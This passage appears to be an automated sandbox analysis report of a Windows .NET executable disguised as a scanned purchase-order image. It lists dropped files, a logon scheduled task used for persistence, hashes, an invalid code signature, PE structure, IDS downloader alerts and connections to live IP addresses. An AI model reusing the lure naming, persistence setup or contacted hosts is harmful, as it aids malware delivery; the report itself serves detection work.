                                                                                                      SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                                                                                      Malicious:false
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"
                                                                                                      Process:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1415
                                                                                                      Entropy (8bit):5.352427679901606
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                                                                                      MD5:3978978DE913FD1C068312697D6E5917
                                                                                                      SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                                                                                      SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                                                                                      SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                                                                                      Malicious:true
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2232
                                                                                                      Entropy (8bit):5.379677338874509
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//MPUyus:tLHxvIIwLgZ2KRHWLOugss
                                                                                                      MD5:EC88D19932BD09E055925B18791E48FB
                                                                                                      SHA1:AE33B55A24121EF5EAF45CE70F20D046E80D7375
                                                                                                      SHA-256:871612889ACB1697FAD69F6387EE3423C7BD8AAB6776DB9AB765965C48192B80
                                                                                                      SHA-512:1770E81F5D8017B0E17BFA03A567BFA1EEE45B18EB2E448DC2E5FD51EA92B5432B817F78AB66AC0E546663676499AA61797A72EE27204497C62B32FB73BDCAAE
                                                                                                      Malicious:false
                                                                                                      Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1578
                                                                                                      Entropy (8bit):5.112783275053078
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxVxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTQv
                                                                                                      MD5:E4BEA43D2518D4DC26A5FDAD6B972E63
                                                                                                      SHA1:C5772AE19C34A9967077B63365AD3D63148953F8
                                                                                                      SHA-256:A15CACA6172EFA881C0FA87E838F9EC4BB60B57A275762E83FB89FEA7A01C11C
                                                                                                      SHA-512:2E74612D1897383EDF743B0B86DACEC6435A35509F777284749C7D8146587560B8454599D0ADFE83F797664B4C4CC3078844AB347633DA8E52826192F2364CFF
                                                                                                      Malicious:true
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                      Process:C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1578
                                                                                                      Entropy (8bit):5.112783275053078
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxVxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTQv
                                                                                                      MD5:E4BEA43D2518D4DC26A5FDAD6B972E63
                                                                                                      SHA1:C5772AE19C34A9967077B63365AD3D63148953F8
                                                                                                      SHA-256:A15CACA6172EFA881C0FA87E838F9EC4BB60B57A275762E83FB89FEA7A01C11C
                                                                                                      SHA-512:2E74612D1897383EDF743B0B86DACEC6435A35509F777284749C7D8146587560B8454599D0ADFE83F797664B4C4CC3078844AB347633DA8E52826192F2364CFF
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                      Process:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):835592
                                                                                                      Entropy (8bit):7.851572121843778
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:0Ixp/JUVKGUrivb8PLJ4nyF9Vy03dbkX057MIZbSXl8Y4Y+AQ17BNzsD8NE+4kXJ:HfOVKUj8TeQVy03d5QIXXVBNADepJ
                                                                                                      MD5:52F14C343D0B2EC1426E775C6B6569FF
                                                                                                      SHA1:5C61B57A86C14DE578F2425773F190DA35BE62E2
                                                                                                      SHA-256:5994CF17202884F994B3E294FCA7CD9C2847B6C98A0BDB5E65CF164F830197A9
                                                                                                      SHA-512:544359181255DD25C6A6F3A218C785AD79865C2D41B0F462664EFE4CADFF7DFDA4963811A099A5CBDE78856AF4FCF1189278E026FE77AEA0F840CD880C00A060
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x.g.................~..........N.... ........@.. ....................................@.....................................K........................6........................................................... ............... ..H............text...T|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................0.......H.......4)...r...........................................................0..A....... .........%.....(......... B........%.S...(.....T...(....*.....&*....0..8........s....}.......{.....t....}f....(.....(.....(....*.....&*.0..........~........E....k...>...d...........T...>....{.... .... ....(...+ w..i.!.........(.... .... ....(...+...+..,.. ..... .o..Y.+..+..{....o....(......8s...*.....&~T....v~T....v.~.... ....._ ...._.*..0..........~T.....~...........E................e.......
                                                                                                      Process:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):26
                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                      Malicious:true
                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):7.851572121843778
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      File name:Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      File size:835'592 bytes
                                                                                                      MD5:52f14c343d0b2ec1426e775c6b6569ff
                                                                                                      SHA1:5c61b57a86c14de578f2425773f190da35be62e2
                                                                                                      SHA256:5994cf17202884f994b3e294fca7cd9c2847b6c98a0bdb5e65cf164f830197a9
                                                                                                      SHA512:544359181255dd25c6a6f3a218c785ad79865c2d41b0f462664efe4cadff7dfda4963811a099a5cbde78856af4fcf1189278e026fe77aea0f840cd880c00a060
                                                                                                      SSDEEP:12288:0Ixp/JUVKGUrivb8PLJ4nyF9Vy03dbkX057MIZbSXl8Y4Y+AQ17BNzsD8NE+4kXJ:HfOVKUj8TeQVy03d5QIXXVBNADepJ
                                                                                                      TLSH:9B05124C7A65A601C51E6B33CC930648A7B1894BD731F69B51DC9AE70FA9BCDC04FA83
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x.g.................~..........N.... ........@.. ....................................@................................
                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                      Entrypoint:0x4c9c4e
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:true
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x671A78C2 [Thu Oct 24 16:41:38 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                      Signature Valid:false
                                                                                                      Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                      Error Number:-2146869232
                                                                                                      Not Before, Not After
                                                                                                      • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                                      Subject Chain
                                                                                                      • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                      Version:3
                                                                                                      Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                      Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                      Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                      Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                                      Instruction
                                                                                                      jmp dword ptr [00402000h]
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xc9c00         | 0x4b         | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xca000         | 0x800        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0xc8a00         | 0x3608       |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0xcc000         | 0xc          | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type | Entropy             | Characteristics
.text  | 0x2000          | 0xc7c54      | 0xc7e00  | 64c2761cc37b2c3c810d1c28909ec490 | False    | 0.9194418386491557  | data      | 7.8591431826748455  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc  | 0xca000         | 0x800        | 0x800    | ec5381d10dfe46fcc18db2a8f4ed78e4 | False    | 0.33984375          | data      | 3.4879933336021693  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xcc000         | 0xc          | 0x200    | ddd8fbac1dd381f1bc303af5bfc9bb6a | False    | 0.044921875         | data      | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name        | RVA     | Size  | Type                                                                              | Language | Country | ZLIB Complexity
RT_VERSION  | 0xca090 | 0x3a0 | data                                                                              |          |         | 0.4224137931034483
RT_MANIFEST | 0xca440 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |          |         | 0.5489795918367347
DLL         | Import
mscoree.dll | _CorExeMain
Timestamp                       | SID     | Signature                                         | Severity | Source IP   | Source Port | Dest IP       | Dest Port | Protocol
2024-10-25T09:18:04.545506+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2        | 192.168.2.4 | 49735       | 193.122.130.0 | 80        | TCP
2024-10-25T09:18:05.889523+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2        | 192.168.2.4 | 49735       | 193.122.130.0 | 80        | TCP
2024-10-25T09:18:06.504984+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H  | 3        | 192.168.2.4 | 49738       | 188.114.97.3  | 443       | TCP
2024-10-25T09:18:07.389273+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2        | 192.168.2.4 | 49740       | 193.122.130.0 | 80        | TCP
2024-10-25T09:18:08.186206+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2        | 192.168.2.4 | 49742       | 193.122.130.0 | 80        | TCP
2024-10-25T09:18:08.779937+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2        | 192.168.2.4 | 49743       | 193.122.130.0 | 80        | TCP
2024-10-25T09:18:09.405582+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H  | 3        | 192.168.2.4 | 49745       | 188.114.97.3  | 443       | TCP
2024-10-25T09:18:09.889320+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2        | 192.168.2.4 | 49742       | 193.122.130.0 | 80        | TCP
2024-10-25T09:18:10.513519+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H  | 3        | 192.168.2.4 | 49747       | 188.114.97.3  | 443       | TCP
2024-10-25T09:18:10.896570+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H  | 3        | 192.168.2.4 | 49748       | 188.114.97.3  | 443       | TCP
2024-10-25T09:18:11.264267+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2        | 192.168.2.4 | 49749       | 193.122.130.0 | 80        | TCP
2024-10-25T09:18:11.993731+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H  | 3        | 192.168.2.4 | 49751       | 188.114.97.3  | 443       | TCP
2024-10-25T09:18:12.481315+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H  | 3        | 192.168.2.4 | 49752       | 188.114.97.3  | 443       | TCP
2024-10-25T09:18:16.714838+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H  | 3        | 192.168.2.4 | 49761       | 188.114.97.3  | 443       | TCP
2024-10-25T09:18:18.216321+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H  | 3        | 192.168.2.4 | 49767       | 188.114.97.3  | 443       | TCP
2024-10-25T09:18:19.178788+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H  | 3        | 192.168.2.4 | 49771       | 188.114.97.3  | 443       | TCP
2024-10-25T09:18:21.689635+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H  | 3        | 192.168.2.4 | 49775       | 188.114.97.3  | 443       | TCP
Timestamp                          | Source Port | Dest Port | Source IP     | Dest IP
Oct 25, 2024 09:18:02.415081978 CEST | 49735       | 80        | 192.168.2.4   | 193.122.130.0
Oct 25, 2024 09:18:02.420639992 CEST | 80          | 49735     | 193.122.130.0 | 192.168.2.4
Oct 25, 2024 09:18:02.420799971 CEST | 49735       | 80        | 192.168.2.4   | 193.122.130.0
Oct 25, 2024 09:18:02.420911074 CEST | 49735       | 80        | 192.168.2.4   | 193.122.130.0
Oct 25, 2024 09:18:02.426645041 CEST | 80          | 49735     | 193.122.130.0 | 192.168.2.4
Oct 25, 2024 09:18:03.298923969 CEST | 80          | 49735     | 193.122.130.0 | 192.168.2.4
Oct 25, 2024 09:18:03.305005074 CEST | 49735       | 80        | 192.168.2.4   | 193.122.130.0
Oct 25, 2024 09:18:03.310405016 CEST | 80          | 49735     | 193.122.130.0 | 192.168.2.4
Oct 25, 2024 09:18:04.494503975 CEST | 80          | 49735     | 193.122.130.0 | 192.168.2.4
Oct 25, 2024 09:18:04.545506001 CEST | 49735       | 80        | 192.168.2.4   | 193.122.130.0
Oct 25, 2024 09:18:04.640729904 CEST | 49736       | 443       | 192.168.2.4   | 188.114.97.3
Oct 25, 2024 09:18:04.640775919 CEST | 443         | 49736     | 188.114.97.3  | 192.168.2.4
